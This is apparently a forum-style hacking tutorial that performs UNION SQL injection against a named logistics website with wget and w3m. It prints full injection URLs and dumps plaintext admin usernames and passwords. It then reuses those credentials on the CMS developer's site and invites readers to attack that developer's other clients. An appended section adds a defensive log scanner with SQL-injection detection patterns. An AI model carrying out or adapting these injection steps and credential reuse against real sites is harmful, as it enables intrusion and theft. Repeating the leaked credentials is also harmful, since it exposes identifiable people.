- ../password_reuse_multi-pwn_like_an_old_school_hacker
- /bit/and/cheese
- ~/today I'll walk you through an epitome of password reuse - and how we pwn several sites with simple vulns_ the anatomy of this tutorial is simple:_
- = using only w3m + wget - because I'm old school & fucking cool
- = union injection
- = exploit password reuse
- $ first we got a target
- wget -S --spider "http://whitearrowlogistics.com/storage.asp?id=19\'"
- HTTP request sent, awaiting response...
- HTTP/1.1 500 Internal Server Error <<< status code is true
- Date: [n/a]
- Server: Microsoft-IIS/6.0
- X-Powered-By: PleskWin
- X-Powered-By: ASP.NET
- $ now we use w3m to confirm
- w3m -dump "http://whitearrowlogistics.com/storage.asp?id=19\'"|grep 'error'|less
- Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
- [MySQL][ODBC 3.51 Driver]
- $ vulnerable - mysql - so we need to find the version_ most mysql versions have 'community' in them - so we're gonna grep for this (since the output was cluttered - we're gonna mark the output with square brackets = 0x5b 0x5d)
- w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x5b,@@version,0x5b,0x2e%29,null,null--'|grep community|less
- $ next we look for the current db
- w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x2e,0x5b,database(),0x5d,0x2e%29,null,null--'|grep 'db'|less
- $ now we dump the username and password
- w3m -dump http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,%28select%20concat%280x7174696a71,ifnull%28cast%28password%20as%20char%29,0x3c62722f3e20%29,0x66727378756d,ifnull%28cast%28username%20as%20char%29,0x3c62722f3e20%29,0x716c627571%29%20from%20whitearrowdb.admin_users%20limit%202,1%29,null,null--|less
- $ voila!_
- user pass
- nigel neubiberg1
- ken na691500a
- mark whitearrow682424
- $ these blokes used strong passwords - too bad they were in plain text!_ time to search for the login page
- wget -S --spider http://www.whitearrowlogistics.com/login/
- wget -S --spider http://www.whitearrowlogistics.com/admin/
- $ got lucky on 2nd try_ let's login..._ with w3m (love the jap for this)
- w3m http://www.whitearrowlogistics.com/admin/
- $ magic!_ now we notice a line at the bottom of the admin page that says >> Please contact sales@e-cc.org 'blah blah' << it means we have found the CMS dev_ let's see if we can pwn it too - find the admin page
- wget -S --spider http://www.whitearrowlogistics.com/admin/
- $ same page as the last target - let's try to log in with the user/pass we have
- w3m http://www.whitearrowlogistics.com/admin/
- $ w00t!_ same pass & usr!
- $$
- $ let's recon the site with Bing search using site:
- w3m -dump 'http://www.bing.com/search?q=site:e-cc.org+asp?id=&go=&filt=all&first=1'|less
- $ first search result said >> www.e-cc.org/webdesigners.asp?id=6 << let's check if this is vuln too
- wget -S --spider www.e-cc.org/webdesigners.asp?id=6
- $$ it gave a 500_ the response said ADODB.Command error '800a0d5d' - in fact - almost all of their clients' websites have some kind of database error_ I'll leave this here for you guys to pick up_
- $ I already shelled the site - so see that as an easter egg ;-)
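From the defender's side, the union probing walked through above leaves a very recognisable trail in the web server log. The following is an added example, not part of the original paste: it scans constructed W3C-style IIS log lines (assumed format: date, time, method, uri-stem, uri-query, status) for the indicators this write-up relies on, a stray quote that turns into a 500, union ... select, hex-marked concat() and the @@version / database() fingerprint probes.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in W3C extended log format: date time cs-method cs-uri-stem cs-uri-query sc-status.
# These lines are modelled on the requests in the write-up above; they are not real server logs.
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /storage.asp id=19 200
2024-01-01 10:00:05 GET /storage.asp id=19' 500
2024-01-01 10:00:09 GET /storage.asp id=-19%20and%201=2%20union%20all%20select%20null,null,concat%280x5b,@@version,0x5d%29-- 200
2024-01-01 10:00:12 GET /index.asp page=about 200
"""

# Signatures of the UNION-based probing shown in the write-up, matched on the URL-decoded query string.
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)  # union all select ...
HEX_CONCAT = re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+", re.I)         # concat(0x5b, ..., 0x5d) markers
FINGERPRINT = re.compile(r"@@version|\bdatabase\s*\(\s*\)", re.I)     # @@version / database() probes


def parse_line(line):
    """Split one log line into uri, decoded query string and status code."""
    _date, _time, _method, stem, query, status = line.split()
    return {"uri": f"{stem}?{query}", "query": unquote_plus(query), "status": int(status)}


def classify(entry):
    """Return the list of injection indicators present in one parsed request (empty if none)."""
    q, reasons = entry["query"], []
    if UNION_SELECT.search(q):
        reasons.append("union-select")
    if HEX_CONCAT.search(q):
        reasons.append("hex-marked concat")
    if FINGERPRINT.search(q):
        reasons.append("db fingerprint")
    # A stray quote in a parameter that produces a 500 is the classic error-based probe.
    if "'" in q and entry["status"] == 500:
        reasons.append("quote probe -> 500")
    return reasons


def flag_sqli_requests(log_text):
    """Return [(uri, reasons)] for every request carrying at least one indicator, in log order."""
    findings = []
    for line in log_text.strip().splitlines():
        entry = parse_line(line)
        reasons = classify(entry)
        if reasons:
            findings.append((entry["uri"], reasons))
    return findings


if __name__ == "__main__":
    for uri, reasons in flag_sqli_requests(SAMPLE_LOG):
        print(uri, "->", ", ".join(reasons))
```

The 500 with an ODBC error body is the other half of the picture: with detailed error pages disabled the quote probe still shows up as a 500 in the log, but the attacker no longer learns the driver and database behind it.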